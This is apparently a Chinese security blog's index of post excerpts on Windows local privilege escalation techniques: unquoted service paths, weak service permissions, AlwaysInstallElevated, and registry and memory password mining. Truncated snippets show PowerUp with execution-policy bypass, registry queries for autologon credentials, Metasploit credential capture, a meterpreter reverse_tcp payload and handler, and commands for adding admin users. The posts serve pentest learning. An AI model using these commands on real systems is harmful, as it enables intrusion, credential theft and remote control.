计划任务的提权 计划任务的提权参考资料: https://www.youtube.com/watch?v=Kgga91U3B4s&list=PLjG9EfEtwbvIrGFTx4XctK8IxkUJkAEqP&index=13 https://payloads.online/archivers/2018-10-08/1#0x03-%E5%AE%9A%E6%97%B6%E4%BB%BB%E5%8A 2020-02-21 windows windows
注册表密码挖掘的提权 注册表密码挖掘的提权 视频教程:https://www.acfun.cn/v/ac13017016 自动登陆密码123456789powershell -nop -ep bypassImport-Module C:\Users\user\Desktop\PowerUp.ps1Get-RegistryAutoLogon #查找注册表中自动登陆的密码---1.reg query &qu 2020-02-20 windows windows
内存密码挖掘 视频教程地址 msfconsole -r pass.rc 123use auxiliary/server/capture/http_basicset uripath xrun 访问http://192.168.1.101/x 12strings /root/Desktop/*.DMP | grep "Authorization: Basic"echo "cXdmOnF 2020-02-18 windows windows
windows本地提权之命名管道 windows本地提权之命名管道参考资料: windows-namedpipes-privilege-escalation what-happens-when-i-type-getsystem/ https://metasploit.help.rapid7.com/docs/getsystem-command-work https://www.anquanke.com/post/id/87292 2020-02-17 windows windows
总是以管理员权限安装的提权 参考资料:https://hacknpentest.com/windows-privilege-escalation-via-alwaysinstallelevated-technique/视频地址作者注:跟linux中的suid权限有点像,某种应用程序,普通用户可以运行,并且程序有着管理员权限。 发现漏洞12reg query HKLM\Software\Policies\Microsoft\W 2020-02-17 windows windows
可修改的自启程序提权 参考资料: youtubu视频 我的视频教程:https://www.bilibili.com/video/av89635859/ 漏洞原理可修改的自启程序提权是利用了自启程序权限不正确。C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe找到开机自启的程序 C:\Users\User\Desktop\Tools\Accesschk\acce 2020-02-16 windows windows
windows本地提权服务之可执行文件 windows本地提权服务之可执行文件b站上的视频教程 漏洞原理是windows服务权限配置不当,任何人都可以修改服务的应用程序。将恶意代码复制到服务的应用程序末尾,重新启动该服务,即可利用漏洞。 运行powershell脚本发现漏洞1234powershell -nop -ep bypassImport-Module C:\Users\user\Desktop\PowerUp.ps1Get-Mo 2020-02-16 windows windows
windows服务之注册表提权 windows服务之注册表提权b站上的视频教程 用户权限NT Authority \ SYSTEM又称LocalSystem帐户是内置的Windows帐户。 它是Windows本地实例上功能最强大的帐户(比任何管理员帐户都更强大)。 大多数系统级别(Windows Services)服务和其他一些第三方服务都在帐户中运行 NT Authority \ SYSTEM 是Builtin\Adminis 2020-02-15 windows windows
未打引号的路径&windows本地提权 我录制了一个演示视频 meterpreter开启监听123456789msfconsolehandler -H 192.168.1.100 -P 4444 -p windows/x64/meterpreter/reverse_tcpmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f ex 2020-02-14 windows windows
windows-cmd用户管理命令 查看查看用户net user 用户 查看用户组net localgroup administrators(用户组) 查看防火墙状态Windows Server 2012 R2 Standardnetsh advfirewall show allprofiles 添加添加用户net user 用户名 密码 /add /expires:never 添加用户密码net user Administrato 2020-02-12 windows windows